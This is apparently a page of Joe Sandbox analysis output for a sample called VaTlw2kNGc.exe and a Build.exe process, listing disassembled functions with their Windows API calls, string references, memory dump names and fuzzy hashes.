DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A553

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
Instruction ID: f72f27fe1bb595bc25a2283e8b9428dc5127ac2f844e347d5a14aa7f1bd05160
Opcode Fuzzy Hash: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
Instruction Fuzzy Hash: B0517772A18E568CF7108FA2E8403BD37B0BB64768F544171DA6E276A6DF38E442C348

Function 00007FF7691B4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF7691B4ABF
GetFileInformationByHandle.KERNEL32 ref: 00007FF7691B4B21
GetLastError.KERNEL32 ref: 00007FF7691B4BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691B49C4), ref: 00007FF7691B4BFE

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
Instruction ID: 3b67deaf55b2bf900068082c1cd07fe594c5191187d35b6648dc90dcc298683b
Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
Instruction Fuzzy Hash: 9B517C22A08651CAFB18EF71E5503BDA3B2EB48B58FA48535DE0987689DF3CD481C760

Function 00007FFE1330C87C Relevance: 6.1, APIs: 4, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C459
Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C492
Part of subcall function 00007FFE1330C3C8: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C7BB

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C8F7
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C906
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C982
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330C991

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
Instruction ID: 0d00968080e08e1589846c03c6b09c29e226ba526c4fe013e151c90ca738453b
Opcode Fuzzy Hash: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
Instruction Fuzzy Hash: E6417772A08B85CDFB01CF69D8413AC37B0BB64B68F548065DE9D6B7AACF389841C314

Function 00007FF7691A2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7691A2064
SetWindowLongPtrW.USER32 ref: 00007FF7691A2086
GetWindowLongPtrW.USER32 ref: 00007FF7691A20B0
InvalidateRect.USER32 ref: 00007FF7691A20D0

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: dcba193661712412712dde0f1e64ee6958b8336f32026eab4c405f1ba52e37fb
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: F911A921F08142C2FA5DAF6AF64427992B1EF88B80FE49531DE4947F9DCD2CD8C6C624

Function 00007FF7691AC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7691AC35C
GetCurrentThreadId.KERNEL32 ref: 00007FF7691AC36A
GetCurrentProcessId.KERNEL32 ref: 00007FF7691AC376
QueryPerformanceCounter.KERNEL32 ref: 00007FF7691AC386

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: 2763cde2e460d71811b8eedc28c28b4342dc5aec1f1af08169427ca340403f09
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: 3D114C22B14B05CAEB009F60F8442B873B4FB59758F840E31DA2D86BA4DF7CE158C750

Function 00007FF7691C4E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691C0A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C0AA3

_get_daylight.LIBCMT ref: 00007FF7691C4F44
_get_daylight.LIBCMT ref: 00007FF7691C4F55

Strings

?, xrefs: 00007FF7691C4ED5

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction ID: 1bf283dd3ee79d78002088e2a418766c89ac584c6f21bf7504ce18dd8197fdbb
Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction Fuzzy Hash: 1E41D512B0C682C6FB28AF25B501779E770EB91BA4FA44235EE5D07AD9DF3CD4418B10

Function 00007FFE13304710 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE133047E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13304844

Strings

csm, xrefs: 00007FFE133048EA

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
Instruction ID: 919e8aa3b6901c1d50e231208a195f6a5a3f081d24c5099668df340230c58bae
Opcode Fuzzy Hash: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
Instruction Fuzzy Hash: 46515137A18B818AD660DF1AE04026E77A4FB98BB0F140575EB9D17B65CF3CE4A1CB04

Function 00007FF7691B832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B835E

Part of subcall function 00007FF7691B9C58: HeapFree.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7691ABEC5), ref: 00007FF7691B837C

Strings

C:\Users\user\Desktop\VaTlw2kNGc.exe, xrefs: 00007FF7691B836A

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\VaTlw2kNGc.exe
API String ID: 3580290477-3782499776
Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction ID: 8ec0a577db9cf52c414b7e13bce90e6b4b47b3d0aa1467e576bbd5d2d877450a
Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
Instruction Fuzzy Hash: 05416036A08B52C6E719FF25F4911BCB3B6EB45B94FA54035EA4E43B99DE3CD4418320

Function 00007FF7691BF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BF916

Part of subcall function 00007FF7691BE8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7691BE908

Strings

:, xrefs: 00007FF7691BF956
., xrefs: 00007FF7691BF967

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: 73f54d41e2f65cec490ecc893310b0faf8beab10b95a0916934e12cbd7a72e3a
Instruction ID: b54f97da19a92e2e943bc31fb2dd757af3d90c5cbf48a949b5ab0268f2b09081
Opcode Fuzzy Hash: 73f54d41e2f65cec490ecc893310b0faf8beab10b95a0916934e12cbd7a72e3a
Instruction Fuzzy Hash: 38416026F08752D8FB14FFB1A8501BC6675AF14758FA40039EE5D67B8DDF38A4469320

Function 00007FF7691BBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7691BC05F
GetLastError.KERNEL32 ref: 00007FF7691BC081

Strings

U, xrefs: 00007FF7691BC00B

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction ID: c3cd2968c8eb6ef4574f38d2bf459be36a180e7b9a29f56cbc44d6714322a635
Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
Instruction Fuzzy Hash: 7A41A422B18A85C5EB24AF25F4443AAB771FB98794FA44035EE4D87B98DF3CD441CB50

Function 00007FFE13309BAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE13309CAA

Strings

void, xrefs: 00007FFE13309C0C
void , xrefs: 00007FFE13309C34

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
Instruction ID: a37da0e49650a488879deb7964826683de3cfa9f538fca6dc6695bef70018f46
Opcode Fuzzy Hash: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
Instruction Fuzzy Hash: 62313572E18E558CFB00CBA6E8410EC37B4BB68768B440576EE6E62B79DF389144C758

Function 00007FF7691BE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7691BE908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7691BE95A

Strings

:, xrefs: 00007FF7691BE91E

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
Instruction ID: 5dc2ea9728abb61aef2ae4b63c10a72cfd873f7b20e709e1f2465431cfeb90c0
Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
Instruction Fuzzy Hash: 3B21B622B08681C1EB68AF15E04427DF3B2FB84B84FE54135D68D43688DF7CDA49CBA1

Function 00007FFE1330604F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE133063F0: RtlPcToFileHeader.KERNEL32 ref: 00007FFE13306434
Part of subcall function 00007FFE133063F0: RaiseException.KERNEL32 ref: 00007FFE1330647A

RtlPcToFileHeader.KERNEL32 ref: 00007FFE133060BF

Strings

Bad dynamic_cast!, xrefs: 00007FFE13306072
Access violation - no RTTI data!, xrefs: 00007FFE1330604F

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
Instruction ID: 5676251dcfaaf0ff1e4969d08f90b9d8dc97fa009be29380f15cbde4cbb1a734
Opcode Fuzzy Hash: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
Instruction Fuzzy Hash: AB01B161A2DE06D9EE40CB16E8501BC6320FFB0BB4F8050B1D56E176BAEF6CD404C308

Function 00007FF7691AF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7691AF0B8
RaiseException.KERNEL32 ref: 00007FF7691AF0F9

Strings

csm, xrefs: 00007FF7691AF0E6

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 94ce0bdcc1f81004d8b6861d16c18a4ddd6435a2bb7dcabd40a7b74d59a568f4
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: 30114936618B84C2EB659F25F540269B7E5FB88B84FA84230DA8D07B68DF3CD951CB00

Function 00007FFE133063F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FFE13306434
RaiseException.KERNEL32 ref: 00007FFE1330647A

Strings

csm, xrefs: 00007FFE13306467

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
Instruction ID: f938d593274e148220e9ee312fd72cffeb749a250c4e82f66e1445d53bb129da
Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
Instruction Fuzzy Hash: 14118F32A08F8182EB518F16F44026DB7A4FB98BA4F684270DE9D17B69DF3CC551C704

Function 00007FF7691BFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BFA7C
GetDriveTypeW.KERNEL32 ref: 00007FF7691BFABC

Strings

:, xrefs: 00007FF7691BFAA5

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: fb77c04894fd7e2f1205b4b6178695d2e6e481c56ab2a1d07d4e951f78faeb66
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: CB01DB26A0C246C6FB2CBF60B46137EA3B0EF48708FE40036D55D82799DE3CE504CA20

Function 00007FFE1330672C Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE133065B9,?,?,?,?,00007FFE1330FB22,?,?,?,?,?), ref: 00007FFE1330674B
SetLastError.KERNEL32(?,?,?,00007FFE133065B9,?,?,?,?,00007FFE1330FB22,?,?,?,?,?), ref: 00007FFE133067D4

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
Instruction ID: 8f3a0269e4e7ca263cb3aff369a8733bfe70b3844679d4ccb9cd7ba3d7f51711
Opcode Fuzzy Hash: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
Instruction Fuzzy Hash: 21112424F0DE528AFA54972398041792291EF68BF0F2446B4D97E277FADF3CA441E608

Analysis Process: Build.exePID: 5840, Parent PID: 1700COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	1750
Total number of Limit Nodes:	37

Executed Functions

Function 0093EA07 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 453
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0093D6C7

Part of subcall function 0093C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0093C5E5

SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,1C667296,?,00000000,00000001), ref: 0093EB53
_wcslen.LIBCMT ref: 0093EB8D
_wcslen.LIBCMT ref: 0093EBA1
_wcslen.LIBCMT ref: 0093EBC6
GetFileAttributesW.KERNEL32(?), ref: 0093EC0C
DeleteFileW.KERNEL32(?), ref: 0093EC1E
_swprintf.LIBCMT ref: 0093EC43
GetFileAttributesW.KERNEL32(?), ref: 0093EC52
MoveFileW.KERNEL32(?,?), ref: 0093EC6B
